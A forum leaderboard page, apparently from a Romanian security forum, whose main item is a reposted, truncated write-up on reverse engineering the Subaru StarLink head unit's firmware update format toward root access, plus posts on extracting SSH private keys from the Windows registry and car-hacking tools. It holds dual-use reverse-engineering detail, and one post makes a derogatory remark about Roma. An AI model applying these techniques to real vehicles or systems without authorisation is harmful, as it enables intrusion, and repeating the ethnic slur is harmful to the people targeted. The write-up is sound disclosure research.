Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 02/17/19 in all areas

  1. We are like brothers. Avoid gipsies. Romania has more gipsies than romanians. :)))))
    5 points
  2. 1985 - 2018 : https://kskedlaya.org/putnam-archive/ 1938 - 1985 : https://mks.mff.cuni.cz/kalva/putnam.html Pentru pasionati.
    2 points
  3. Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included. tl;dr: Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry Source: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
    2 points
  4. Romania on a motorbike is a bad idea dude. Bad roads, stupidly placed or nonexistent road signs and full of morons with a driving license. If you value your life and health, go the opposite way, to Croatia or even Italy.
    1 point
  5. E posibil sa fie un dead-end. Nu stiu cat de inteligente sunt aparatele alea si softul din spate dar cred ca au facut o mica modificare prin care sa verifice bitul 3(asociat OTP-ului) de LOCK astfel incat daca e pus pe read-only aparatul sa iti dea o eroare. Vulnerabilitatea e cunoscuta inclusiv de ei iar implementarea unei verificari de genul nu cred ca ar pune prea mari probleme daca aparatele respective sunt reprogramabile sau comunica cu un server. In informatiile de pe cardul respectiv sunt si informatii despre ruta. Era un program pentru android prin care puteai citi informatiile respective dar nu stiu daca il mai poti gasi. In alta ordine de idei, ceea ce cauti si probabil ceea ce vrei sa realizezi constituie o infractiune indiferent daca ai intentii bune sau nu.
    1 point
  6. Synopsis: CarHacking.Tools is a script I built to help people who are interested in exploring car hacking and research to get a quick start. I decided to invest the time into building this script after spending many hours finding, installing, configuring many of the tools available and very little of it actually "hacking" a car. Link: https://carhacking.tools/
    1 point
  7. Read the fucking date from the post before you write something
    1 point
  8. Jailbreaking Subaru StarLink Another year, another embedded platform. This exercise, while perhaps less important than the medical security research I've worked on the past, is a bit more practical and entertaining. What follows is a technical account of gaining persistent root code execution on a vehicle head unit. Table of Contents Jailbreaking Subaru StarLink Table of Contents Introduction Shared Head Unit Design Existing Efforts SSH Finding the Manufacturer Harman and QNX Dr. Charlie Miller & Chris Valasek's Paper First Recap Analysis of Attack Surfaces USB Update Mechanism On My Warranty Hardware Analysis Board Connectors Serial Port Installing the Update Firmware swdl.iso IFS Files ifs-subaru-gen3.raw Contents Files of Note minifs.ifs Contents ISO Modification Reverse Engineering QNXCNDFS installUpdate Flow cdqnx6fs Cluster Table Cluster Data Decrypting Key Generation Emulation Cluster Decryption Cluster Decompression Mounting the Image The Extents Section Understanding the Extents Final Decompression system.dat ifs_images Back to QNXCNDFS The Shadow File Non-privileged Code Execution Image Creation Root Escalation Backdooring SSH Putting it All Together CVE-2018-18203 Next Steps Notes from Subaru and Harman Note from Subaru Note from Harman Conclusion Introduction Back in June, I purchased a new car: the 2018 Subaru Crosstrek. This vehicle has an interesting head unit that's locked down and running a proprietary, non-Android operating system. Let's root it. If this was Android, we could most likely find plenty of pre-existing PoCs and gain root rather trivially as most vehicle manufacturers never seem to update Android. Because this isn't an old Android version, we'll have to put a little more work in than usual. Shared Head Unit Design In 2017, Subaru launched a new version of their StarLink head unit on the Impreza. The same head unit appears to be used on the 2018+ Crosstrek, as well as the latest Forester and Ascent. If we can root the base device, we can potentially root every head unit on every vehicle sharing the same platform. There are a few SKUs for the head units on the Crosstrek and Impreza. The cheapest model has a 6-inch screen. A higher trim model has an 8-inch screen, and the top of the line model has the 8-inch screen as well as an embedded GPS mapping system. All models support Apple Carplay and Android Auto. The 8-inch models can connect to WiFi networks and theoretically download firmware updates wirelessly, but this functionality doesn't seem to be in use yet. Existing Efforts Starting from scratch, we know virtually nothing about the head unit. There are no obvious debugging menus, no firmware versions listed anywhere, and no clear manufacturer. First, we need to research and find out if anyone else has already accomplished this or made any progress understanding the unit. The only useful data was posted by redditor nathank1989. See his post in /r/subaruimpreza, and, more importantly, the replies. To quote his post: SSH Into STARLINK Just got myself the 2017 Impreza Sport and can see there's an open SSH server. Kudos to the person who knows what is or how to find the root user and password. 2 hours of googling has yielded nothing. SSH is a good sign — we're mostly likely running some sort of Unix variant. Further down in the Reddit post, we have a link to a firmware update. This will save us time as getting access to a software update is sometimes quite difficult with embedded systems. Subaru later took this firmware update down. They had linked to it from the technical service manuals you can purchase access to through Subaru. It appears that Subarunet did not require any form of authentication to download files originally. I did not get the files from this link as they were down by the time I found the thread, but, the files themselves had been mirrored by many Subaru enthusiasts. These files can be placed on a USB thumb drive, inserted into the vehicle's USB ports, and the firmware installed on the head unit. Aside from this, there really isn't much information out there. SSH What happens if we connect to SSH over WiFi? ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. ********************************************************************* root@192.168.0.1's password: Dead end. Brute forcing is a waste of time and finding an exploit that would only work on the top tier of navigation models with WiFi isn't practical. Finding the Manufacturer We can find the manufacturer (Harman) in several different ways. I originally discovered it was Harman after I searched several auction sites for Subaru Impreza head units stripped out of wrecked vehicles. There were several for sale that had pictures showing stickers on the removed head unit with serial numbers, model numbers, and, most importantly, the fact that Harman manufacturers the device. Another way would be to remove the head unit from a vehicle, but I'm not wealthy enough to void the warranty on a car I enjoy, and I've never encountered a dash that comes out without tabs breaking. The technical manuals you can pay for most likely have this information as well as the head unit pinout. Hidden debug and dealer menus are accessible via key combinations. One of these menus hints that the device is running QNX and is from Harman. See another useful Reddit post by ar_ar_ar_ar. From the debug menu, we know we're running QNX 6.60. Harman and QNX Now that we know the manufacturer and OS, we can expand the search a bit. There are a few interesting publications on Harman head units, and one of them is both useful and relatively up-to-date. Dr. Charlie Miller & Chris Valasek's Paper Back in 2015, Dr. Charlie Miller and Chris Valasek presented their automotive research at Blackhat: Remote Exploitation of an Unaltered Passenger Vehicle. This is, by far, the best example of public research on Harman head units. Thank you to Dr. Miller and Chris for publishing far more details than necessary. The paper covers quite a few basics of Harman's QNX system and even shows the attacks they used to gain local code execution. Although the system has changed a bit since then, it is still similar in many ways and the paper is well worth reviewing. First Recap At this point, we know the following: This is a Harman device. It is running QNX 6.60. We have a firmware image. Analysis of Attack Surfaces Where do we begin? We can attack the following systems, listed by approximate difficulty, without having to disassemble the vehicle: Local USB Update Mechanism USB Media Playback (metadata decoding?) OBD? iPod Playback Protocol Carplay/Android Auto Interfaces CD/DVD Playback & Metadata Decoding Wireless WiFi Bluetooth FM Traffic Reception / Text Protocols There are more vectors, but attacking them often isn't practical at the hobbyist level. USB Update Mechanism The biggest attack vector (but not necessarily the most important) on a vehicle head unit is almost always the head unit software update mechanism. Attackers need a reliable way to gain access to the system to explore it for other vulnerabilities. Assuming it can be done, spoofing a firmware update is going to be a much more "global" rooting mechanism than any form of memory corruption or logic errors (barring silly mistakes like open Telnet ports/DBUS access/trivial peek/poke etc.). Thus, finding a flaw like this would be enormously valuable from a vulnerability research perspective. On My Warranty If we’re going to start attacking an embedded system, we probably shouldn’t attack the one in a real, live vehicle used to drive around town. More than likely nothing bad would happen assuming correct system design and architecture (a safe assumption?), but paying to have the dealer replace the unit would be very expensive. This could also potentially impact the warranty, which could be cost-prohibitive. Auction sites have plenty of these for sale from salvage yards for as low as $200. That's a fantastic deal for a highly proprietary system with an OEM cost of more than $500. Hardware Analysis Before we look at the firmware images we grabbed earlier, let's evaluate the hardware platform. This is pretty standard for embedded systems. First, figure out how to power on the system. We need a DC power supply for the Subaru head unit as well as the wiring diagram for the back of the unit in order to know what to attach the power leads to. I didn't feel like paying the $30 for access to the technical manual, so I searched auction sites for a while, eventually found a picture of the wiring harness, noted that the harness had one wire that was much thicker than the others, guessed that was probably power, attached the leads, prayed, and powered the unit on. I don't recommend doing that, but it worked this time. Next, disassemble the device and inventory the chips on the system. Important parts: ARM processors. USB ports. (correspond to the USB ports in the car for iPhone attachment etc) Unpopulated orange connectors. (Interesting!) 32GB eMMC. The eMMC is a notable attack vector. If we had unlimited time and money, dump the contents via attaching test points to nearby leads else by desoldering the entire package. Unfortunately, I don't have the equipment for this. At minimum I'd want a rather expensive stereo microscope, and that isn't worth the cost to me. One could potentially root the device by desoldering, dumping, modifying a shadow file, reflashing, and resoldering. A skilled technician (i.e. professional attacker) in a well-equipped lab could do this trivially. Board Connectors There are strange looking orange connectors with Kapton tape covering them. How do we find the connectors so we can easily probe the pins? We could trawl through tiny, black and white DigiKey pictures for a while and hopefully get lucky, but asking electronics.stackexchange.com is far simpler. I posted the question and had many members helpfully identify the connector as Micromatch in less than an hour. Fantastic. Order cable assemblies from DigiKey, attach them, then find the 9600 or 115200 baud serial port every embedded system under the sun always has. Always. Serial Port SUBARU Base, date:Jul 11 2017 Using eMMC Boot Area loader in 79 ms �board_rev = 6 Startup: time between timer readings (decimal): 39378 useconds Welcome to QNX 660 on Harman imx6s Subaru Gen3 ARM Cortex-A9 MPCore login: RVC:tw9990_fast_init: Triggered TW9990 HW Reset RVC:tw9990_fast_init: /dev/i2c4 is ready WFDpixel_clock_kHz: 29760 WFDhpixels: 800 WFDhfp: 16 WFDhsw: 3 WFDhbp: 45 WFDvlines: 480 WFDvfp: 5 WFDvsw: 3 WFDvbp: 20 WFDflags: 2 RVC:tw9990_fast_init: Decoder fast init completed [Interrupt] Attached irqLine 41 with id 20. [Interrupt] Attached irqLine 42 with id 21. root root Password: Login incorrect Serial has a username and password. A good guess is that it's using the exact same credentials as the SSH server. Another dead end. At this point I tried breaking into some form of bootloader on boot via keystrokes and grounding various chips, but no luck. There are other pins, so we could look for JTAG, but since we have a firmware update package, let's investigate that first. JTAG would involve spending more money, and part-time embedded security research isn't exactly the most lucrative career choice. Installing the Update To install the update, we first need to solder on a USB socket so we can insert a flash drive into the test setup. Subaru seems to sell these cables officially for around 60$. The cheaper way is to splice a USB extension cord and solder the four leads directly to the board. After doing this step, the system accepts the downloaded update. The device I purchased from a salvage yard actually had a newer firmware version than the files I got from various Subaru forums. The good news is that the system supports downgrading and does not appear to reject older firmwares. It also happily reinstalls the same firmware version on top of itself. Now onto the firmware analysis stage. Firmware Here's what the update package has: BASE-2017MY Impreza Harman Audio Update 06-2017/update/KaliSWDL$ ls -lash total 357M 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 . 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 .. 4.0K -rwxrwxrwx 1 work work 1.8K Jun 7 2017 checkswdl.bat 44K -rwxrwxrwx 1 work work 43K Jun 7 2017 KaliSWDL.log 784K -rwxrwxrwx 1 work work 782K Jun 7 2017 md5deep.exe 167M -rwxrwxrwx 1 work work 167M Jun 7 2017 swdl.iso 0 -rwxrwxrwx 1 work work 48 Jun 7 2017 swdl.iso.md5 86M -rwxrwxrwx 1 work work 86M Jun 7 2017 swupdate.dat 104M -rwxrwxrwx 1 work work 104M Jun 7 2017 system.dat checkswdl.bat - Checks the md5sum of swdl.iso and compares it with swdl.iso.md5. Prints a nice pirate ship thumbs-up on a successful verification, else a pirate flag on failure. _@_ ((@)) ((@)) ((@)) ______===(((@@@@====) ##########@@@@@=====)) ##########@@@@@----)) ###########@@@@----) ========----------- !!! FILE IS GOOD !!!! At first, I thought the only signature checking on the update was a md5 sum we could modify in the update folder. Thankfully, that assumption was incorrect. KaliSWDL.log - Build log file. This doesn't look like it needs to be included with the update package. My guess is that it is just a build artifact Harman didn't clean up. VARIANT : NAFTA LOGFILE : F:\Perforce\Jenkins\Slave\workspace\Subaru_Gen3_Release_Gen3.0\project\build\images\KaliSWDL\KaliSWDL.log MODELYEAR : MY2017 BUILD VERSION : Rel2.17.22.20 BUILD YEAR : 17 BUILD WEEK : 22 BUILD PATCH : 20 BUILD TYP : 1 BUILD BRANCH : Rel BUILD VP : Base The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. - BuildType - 1 - Build Branch - Rel - Build Version Year - 17 - Build version Week - 22 - Build Version Patch - 20 - Model Year - MY2017 - Market - NA - Market - NA - VP - Base - Salt - 10 swdl.iso - ISO file containing lots of firmware related files. Guessing the ISO format was left over from older Harman systems where firmware updates were burned onto CDs. dat files - swupdate.dat and system.dat are high entropy files with no strings. Almost certainly encrypted. Only useful piece of information in the file is "QNXCNDFS" right at the beginning. Search engines, at the time I first looked at this, had no results for this filetype. My guess was that it was custom to Harman and/or QNX. $ hexdump -Cv -n 96 swupdate.dat 00000000 51 4e 58 43 4e 44 46 53 01 03 01 00 03 00 00 00 |QNXCNDFS........| 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 00000020 00 a4 07 0c 00 00 00 00 00 02 00 00 00 00 00 00 |................| 00000030 80 02 00 00 00 00 00 00 90 0e 00 00 00 00 00 00 |................| 00000040 04 00 00 00 00 00 00 00 c1 00 00 00 00 00 00 00 |................| 00000050 00 00 10 00 00 80 10 00 04 00 00 00 04 00 00 00 |................| As the dat files look encrypted, starting with the ISO file makes the most sense. swdl.iso The ISO contains many files. More build artifacts with logs from the build server, what look like bootloader binary blobs, several QNX binaries with full debug symbols we can disassemble, one installation shell-script and, most importantly, IFS files. $ file softwareUpdate softwareUpdate: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /usr/lib/ldqnx.so.2, BuildID[md5/uuid]=381e70a72b349702a93b06c3f60aebc3, not stripped IFS Files QNX describes IFS as: An OS image is simply a file that contains the OS, plus any executables, OS modules, and data files that are needed to get the system running properly. This image is presented in an image filesystem (IFS). Thus, IFS is a binary format used by QNX. The only other important information to note here is that we can extract them with tools available on github. See dumpifs. ifs-subaru-gen3.raw Contents Running dumpifs on ifs-subaru-gen3.raw gets us this: Decompressed 1575742 bytes-> 3305252 bytes Offset Size Name 0 8 *.boot 8 100 Startup-header flags1=0x9 flags2=0 paddr_bias=0 108 52008 startup.* 52110 5c Image-header mountpoint=/ 5216c 1994 Image-directory ---- ---- Root-dirent 54000 8e000 proc/boot/procnto-instr e2000 16f4 proc/boot/.script e4000 521 bin/.kshrc e5000 2e6 bin/boot.sh e6000 10d bin/mountMMC0.sh e7000 63 bin/umountMMC0.sh e8000 6b bin/mountUSB.sh e9000 2b9 bin/mountUSBUpdate.sh ea000 6d6 bin/startUpdate.sh Lots of base operating system files. We can extract most of them via dumpifs -bx ifs-subaru-gen3.raw. $ ls authorized_keys ftpd.conf libtracelog.so.1 shadow banner ftpusers ln slay Base.pub getconf login sleep boot.sh gpio.conf lsm-pf-v6.so slogger2 cam-disk.so group mount spi-master cat hosts mount_ifs spi-mx51ecspi.so checkForUpdate.sh i2c-imx mountMMC0.sh sshd_config cp ifs-subaru-gen3.raw mountUSB.sh ssh_host_dsa_key devb-sdmmc-mx6_generic img.conf mountUSBUpdate.sh ssh_host_key devc-pty inetd.conf mv ssh_host_rsa_key devc-sermx1 init.sh NAFTA.pub startNetwork.sh dev-ipc io passwd startRvc.sh dev-memory io-blk.so pf.conf startUpdate.sh dev-mmap ipl-subaru-gen3.bin pf.os SubaruPubkey.pmem earlyStartup.sh ksh pipe symm.key echo libcam.so.2 prepareEMMCBootArea.sh sync eMMCFactoryFormat.sh libc.so.3 procnto-instr touch eMMCFormat.sh libdma-sdma-imx6x.so.1 profile umount enableBootingFromEMMCBootArea.sh libfile.so.1 rm umountMMC0.sh fram.conf libslog2parse.so.1 scaling.conf uname fs-dos.so libslog2shim.so.1 scaling_new.conf updateIPLInEMMCBootArea.sh fs-qnx6.so libslog2.so.1 services waitfor This clearly isn't even close to all of the files the system will use to boot and launch the interface, but it's a start. Files of Note authorized_keys - key for sshd. Probably how Harman engineers can login over SSH for troubleshooting and field support. banner - sshd banner we see when we connect over WiFi. This indicates that we're looking at the right files. sshd_config - AllowUsers root, PasswordAuthentication yes, PermitRootLogin yes, Wow! passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: ubtsvc:x:3:9:bt service:/: logger:x:101:71:Subaru Logger:/home/logger:/bin/sh certifier:x:102:71:Subaru Certifier:/home/certifier:/bin/sh shadow - Password hashes for root and other accounts. QNX6 hashtype is supported by JTR (not hashcat as far as I am aware), but doesn't appear to be GPU accelerated. I spent several days attempting a crack on a 32-core system using free CPU credits I had from one of the major providers, but without GPU acceleration, got nowhere. As long as they made the password decently complicated, there isn't much we can do. startnetwork.sh - Starts "asix adapter driver" then loads a DHCP client. AKA we can buy a cheap USB to Ethernet adapter, plug it into the head unit's USB ports, and get access to the vehicles internal network. This allows us access to sshd on base units that do not have the wireless chipset. This is almost certainly how Harman field engineers troubleshoot vehicles. We can verify this works by buying an ASIX adapter, plugging it in, powering up the head unit, watching traffic on Wireshark, and seeing the DHCP probes. symm.key - Clearly a symmetric key. Obvious guess is the key that decrypts the .dat files. Perfect. minifs.ifs Contents There are other IFS files included in the ISO. miniifs seems to contain most of the files used during the software update process. Almost every command line binary on the system has handy help descriptions we can get via strings: %C softwareUpdate Usage => -------- To Start Service installUpdate -c language files -l language id -i ioc channel name ( e.g. /dev/ioc/ch4) -b If running on Subaru Base Variant -p pps path to platform features, e.g /pps/platform/features -r config file path for RH850 Binary mapping e.g)# installUpdate & or # e.g) # installUpdate -l french_fr &NAME=installUpdate DESCRIPTION=installUpdate There are too many files to note here, but a few stand out: andromeda - An enormous 17MB-20MB binary blob that seems to run the UI and implement most of the head unit functionality. Looks to make heavy use of QT. installUpdate - Installs update files. installUpdate.sh - Shell script that triggers the update. Unknown who or what calls this script. So, installUpdate.sh executes this at the end: echo " -< Start of InstallUpdate Service >- " installUpdate -c /fs/swMini/miniFS/usr/updatestrings.json -b postUpdate.sh What's in updatestrings.json? "SWDL_USB_AUTHENTICATED_FIRST_SCREEN": "This update may take up to 60 minutes to<br>complete. Please keep your vehicle running<br>(not Accessory mode) throughout the entire<br>installation.", "SWDL_USB_AUTHENTICATED_SECOND_SCREEN": "If you update while your vehicle is idling,<br>please make sure that your vehicle<br>is not in an enclosed spa ce such as a<br>garage.", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN": "The infotainment system will be temporarily<br>unavailable during the update.<br>Current Version: %s<br>Availab le Version: %s<br>Would you like to install now?", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN_SAME_IMAGE": "The infotainment system will be temporarily<br>unavailable", The file contains the same strings shown to the user through the GUI during the software update process. Hence, installUpdate is almost certainly the file we want to reverse engineer to understand the update process. Remember the encrypted dat files with the QNXCNDFS header? Let's see if any binaries reference that string. $ ag -a QNXCNDFS Binary file cdqnx6fs matches. Binary file cndfs matches. $ strings cndfs %C - condense / restore Power-Safe (QNX6) file-systems %C -c [(general-option | condense-option)...] src dst %C -r [(general-option | restore-option)...] src dst General options: -C dll specify cache-control DLL to use with direct I/O -f force use of direct I/O, even if disk cache cannot be discarded -I use direct I/O for reading data -k key specify the key to use for data encryption / decryption. <key> must be a string of hexadecimal digits, optionally separated by punctuation characters. -K dll[,args] specify a DLL to provide the key to use for data encryption or decryption. Optionally, an arguments string can be added which will be passed to the key provider function. See below. -O use direct I/O for writing data -p name store progress information in shared-memory object <name> -s size specify the chunk size [bytes] (default: 1M) -S enable synchronous direct I/O. This should cause io-blk to discard cached blocks on direct I/O, which may reduce performance. Default is to try and discard the cache for the entire device before any I/O is performed (see -f option). -v increase verbosity -? print this help Condense-options: -b size specify the raw block size for compression [bytes] (default: 64k) -c condense file-system <src> into file <dst> -d num specify the data hashing method. <num> must be in the range 0..7 (default: 4). See below for supported methods. -D deflate data -h num specify the header hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. -m num specify the metadata hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. Restore-options: -r restore file-system <dst> from condensed file <src> -V verify written data during restoration Where: src is the source file / block device dst is the destination file / block device Hash methods: 0 = none 1 = CRC32 2 = MD5 3 = SHA224 4 = SHA256 5 = SHA384 6 = SHA512 7 = AES256-GCM (encrypts; requires 256-bit key) It appears that cndfs/cdqnx6fs can both encrypt/decrypt our dat files, and CNDFS stands for "condensed" filesystem. The help message also lets us know that it is almost certainly encrypted with AES256-GCM, uses a 256-bit key, and may be compressed. Unfortunately, we'd need code execution to run this. ISO Modification The most logical first attack is to modify the ISO. We can verify this method is impossible by changing a single byte in the image and trying to install it. On USB insertion, the device probes for certain files on the USB stick. If it finds files that indicate an update, it will claim that it is verifying the integrity of the files (although it actually doesn't do this until reboot, strange!), print a "success" message, reboot into some form of software-update mode, then actually checks the integrity of the ISO. Only the ISO header appears to be signed, but the header contains a SHA hash of the rest of the ISO. Installation will only continue if the header and SHA hashes validate. Barring a mistake in the signature verification subroutines, we will be unable to modify the ISO for trivial code execution. At this point we've extracted a large number of relevant files from the update package. The files appear to be specific to the early boot process of the device and a specific update mode. We don't yet know what is contained in the encrypted dat files. Reverse Engineering QNXCNDFS As code execution via ISO modification is unfortunately (fortunately?) not trivial, the next step is to decrypt the condensed dat file. Ideally the encrypted files contain some form of security sensitive functionality — i.e. perhaps debug functionality we can abuse on USB insertion. Plenty of embedded systems trigger functionality and debug settings when specific files are loaded onto USB drives and inserted, so we can hope for that here. At worst, we will most likely gain access to more system files we can investigate for rooting opportunities. QNXCNDFS is a custom image format with no known information available on the Internet, so we'll start from scratch with the installUpdate binary. We know that cndfs or cdqnx6fs are probably involved as they contain the QNXCNDFS string, but how do they get called? installUpdate Flow First, find any references to the cdqnx6fs or cndfs files in installUpdate. It probably gets called here: LOAD:0805849C ; r0 is key? LOAD:0805849C LOAD:0805849C dat_spawn_copy_directory ; CODE XREF: check_hash_copy+CA↓p LOAD:0805849C LOAD:0805849C var_28 = -0x28 LOAD:0805849C var_24 = -0x24 LOAD:0805849C var_20 = -0x20 LOAD:0805849C var_1C = -0x1C LOAD:0805849C var_18 = -0x18 LOAD:0805849C var_14 = -0x14 LOAD:0805849C LOAD:0805849C 70 B5 PUSH {R4-R6,LR} LOAD:0805849E 0C 46 MOV R4, R1 LOAD:080584A0 86 B0 SUB SP, SP, #0x18 LOAD:080584A2 0E 49 LDR R1, =aCopyDirectoryC ; "Copy Directory Command " LOAD:080584A4 06 46 MOV R6, R0 LOAD:080584A6 0E 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080584A8 15 46 MOV R5, R2 LOAD:080584AA FC F7 9D FA BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080584AE FC F7 6B FA BL sub_8054988 LOAD:080584B2 0C 4B LDR R3, =aR ; "-r" LOAD:080584B4 04 36 ADDS R6, #4 LOAD:080584B6 03 94 STR R4, [SP,#0x28+var_1C] LOAD:080584B8 02 96 STR R6, [SP,#0x28+var_20] LOAD:080584BA 01 20 MOVS R0, #1 LOAD:080584BC 00 93 STR R3, [SP,#0x28+var_28] LOAD:080584BE 0A 4B LDR R3, =aK ; "-k" LOAD:080584C0 04 95 STR R5, [SP,#0x28+var_18] LOAD:080584C2 0A 4A LDR R2, =(aFsSwminiMinifs_10+0x16) ; "cdqnx6fs" LOAD:080584C4 01 93 STR R3, [SP,#0x28+var_24] LOAD:080584C6 00 23 MOVS R3, #0 LOAD:080584C8 05 93 STR R3, [SP,#0x28+var_14] LOAD:080584CA 09 4B LDR R3, =off_808EA34 LOAD:080584CC D3 F8 94 10 LDR.W R1, [R3,#(off_808EAC8 - 0x808EA34)] ; "/fs/swMini/miniFS/bin/cdqnx6fs" LOAD:080584D0 08 4B LDR R3, =(aSCSIV+0xC) ; "-v" LOAD:080584D2 F9 F7 E0 E9 BLX spawnl LOAD:080584D6 06 B0 ADD SP, SP, #0x18 LOAD:080584D8 70 BD POP {R4-R6,PC} LOAD:080584D8 ; End of function dat_spawn_copy_directory spawnl creates a child process, so this seems like the correct location. If we look at the caller of dat_spawn_copy_directory, we find ourselves near code verifying some form of integrity of a dat file. LOAD:080586BC loc_80586BC ; CODE XREF: check_hash_copy+2E↑j LOAD:080586BC ; check_hash_copy+8E↑j LOAD:080586BC 20 6D LDR R0, [R4,#0x50] LOAD:080586BE 29 46 MOV R1, R5 LOAD:080586C0 3A 46 MOV R2, R7 LOAD:080586C2 04 F0 80 F8 BL check_dat_hash LOAD:080586C6 01 28 CMP R0, #1 LOAD:080586C8 81 46 MOV R9, R0 LOAD:080586CA 06 D1 BNE loc_80586DA LOAD:080586CC LOAD:080586CC invalid_dat_file ; CODE XREF: check_hash_copy+40↑j LOAD:080586CC 2E 49 LDR R1, =aIntrusionDetec ; "Intrusion detected: Invalid dat file!!!" LOAD:080586CE 2B 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080586D0 FC F7 8A F9 BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080586D4 FC F7 58 F9 BL sub_8054988 LOAD:080586D8 41 E0 B loc_805875E check_dat_hash doesn't actually verify the dat files — instead, it verifies the ISO contents hash to a value that is in the ISO header. This is relatively easy to discover as the function does a fseek to 0x8000 right at the start. LOAD:0805C850 4F F4 00 41 MOV.W R1, #0x8000 ; off LOAD:0805C854 2A 46 MOV R2, R5 ; whence LOAD:0805C856 F4 F7 66 EE BLX fseek LOAD:0805C85A 78 B1 CBZ R0, loc_805C87C LOAD:0805C85C 04 21 MOVS R1, #4 LOAD:0805C85E 05 22 MOVS R2, #5 LOAD:0805C860 32 4B LDR R3, =aFseekFailedToO ; "Fseek failed to offset 32768" What is 0x8000? The ISO 9660 filesystem specifies that the first 0x8000 bytes are "unused". Harman appears to use this section for signatures and other header information. Thus, installUpdate is seeking past this header, then hashing the rest of the ISO contents to verify integrity. The header is signed and contains the comparison hash, so we cannot just modify the ISO header hash to modify the ISO as we'd also need to re-sign the file. That would require Harman's private key, which we obviously don't have. Before installUpdate calls into the QNXCNDFS functionality, the system needs to successfully verify the ISO signature. Easy enough, we already have a valid update that is signed. cdqnx6fs Start by looking at the cdqnx6fs strings. This handy string pops out: Source: '%s' %s Destination: '%s' %s Chunk size: %u bytes Raw chunk size: %u bytes Max raw blk length: %u bytes Max cmp blk length: %u bytes Extents per chunk: %u Condensed file information: Signature: 0x%08llx Version: 0x%08x Flags: 0x%08x Compressed: %s File size: %llu bytes Number of extents: %llu Header hash method: %s Payload data: %llu bytes Header hash: %s Metadata hash method: %s Metadata hash: %s Data hash method: %s Data hash: %s File system information: File system size: %llu bytes Block size: %u bytes Number of blocks: %u Bitmap size: %u bytes Nr. of used blocks: %u On execution, the application prints out a large amount of header data. If we go to the function printing this string, the mapping between the header and the string prints becomes clear. LOAD:0804AA8C 4D F2 1C 10+ MOV R0, #aCondensedFileI ; "Condensed file information:" LOAD:0804AA94 FF F7 96 E9 BLX puts LOAD:0804AA98 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AA9A D3 E9 00 23 LDRD.W R2, R3, [R3] LOAD:0804AA9E 4D F2 38 10+ MOV R0, #aSignature0x08l ; " Signature: 0x%08llx\n" LOAD:0804AAA6 FF F7 3A E9 BLX printf LOAD:0804AAAA BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAAC 1B 89 LDRH R3, [R3,#8] LOAD:0804AAAE 4D F2 5C 10+ MOV R0, #aVersion0x04hx ; " Version: 0x%04hx\n" LOAD:0804AAB6 19 46 MOV R1, R3 LOAD:0804AAB8 FF F7 30 E9 BLX printf LOAD:0804AABC BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AABE 5B 89 LDRH R3, [R3,#0xA] LOAD:0804AAC0 4D F2 80 10+ MOV R0, #aFsType0x04hx ; " FS type: 0x%04hx\n" LOAD:0804AAC8 19 46 MOV R1, R3 LOAD:0804AACA FF F7 28 E9 BLX printf LOAD:0804AACE BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAD0 DB 68 LDR R3, [R3,#0xC] LOAD:0804AAD2 4D F2 A4 10+ MOV R0, #aFlags0x08x ; " Flags: 0x%08x\n" R3 points to the DAT file contents. Before each print, a constant is added to the DAT file content pointer then the value is dereferenced. In effect, each load shows us the correct offset to the field being printed. Thus, signature is offset 0 (the QNXCNDFS string, not a digital signature one might first suspect), version is offset 8, filesystem type is offset 0xA, etc. Using this subroutine, we can recover around 70-80% of the header data for the encrypted file with virtually no effort. Since we don't know what FS type actually means or corresponds to, these aren't the best fields to verify. If we go down a bit in the function, we get to more interesting header fields with sizes. LOAD:0804AB38 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB3A D3 E9 04 23 LDRD.W R2, R3, [R3,#0x10] LOAD:0804AB3E 4D F2 10 20+ MOV R0, #aRawSizeLluByte ; " Raw size: %llu bytes\n" LOAD:0804AB46 FF F7 EA E8 BLX printf LOAD:0804AB4A BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB4C D3 E9 06 23 LDRD.W R2, R3, [R3,#0x18] LOAD:0804AB50 4D F2 38 20+ MOV R0, #aCondensedSizeL ; " Condensed size: %llu bytes\n" LOAD:0804AB58 FF F7 E0 E8 BLX printf LOAD:0804AB5C BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB5E D3 E9 08 23 LDRD.W R2, R3, [R3,#0x20] LOAD:0804AB62 4D F2 60 20+ MOV R0, #aRawDataBytesLl ; " Raw data bytes: %llu bytes\n" LOAD:0804AB6A FF F7 D8 E8 BLX printf Condensed size is a double-word (64-bit value) loaded at offset 0x18. This corresponds to this word in our header: 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 8c 1d 5e 05 00 00 00 00 is little endian for 90054028 bytes, which is the exact size of swupdate.dat. This is confirmation that we're on the right track with the header. The header contains several configurable hashes. There's a hash for the metadata, a hash for an "extents" and "cluster" table, and finally a hash for the actual encrypted data. The hash bounds can be reverse 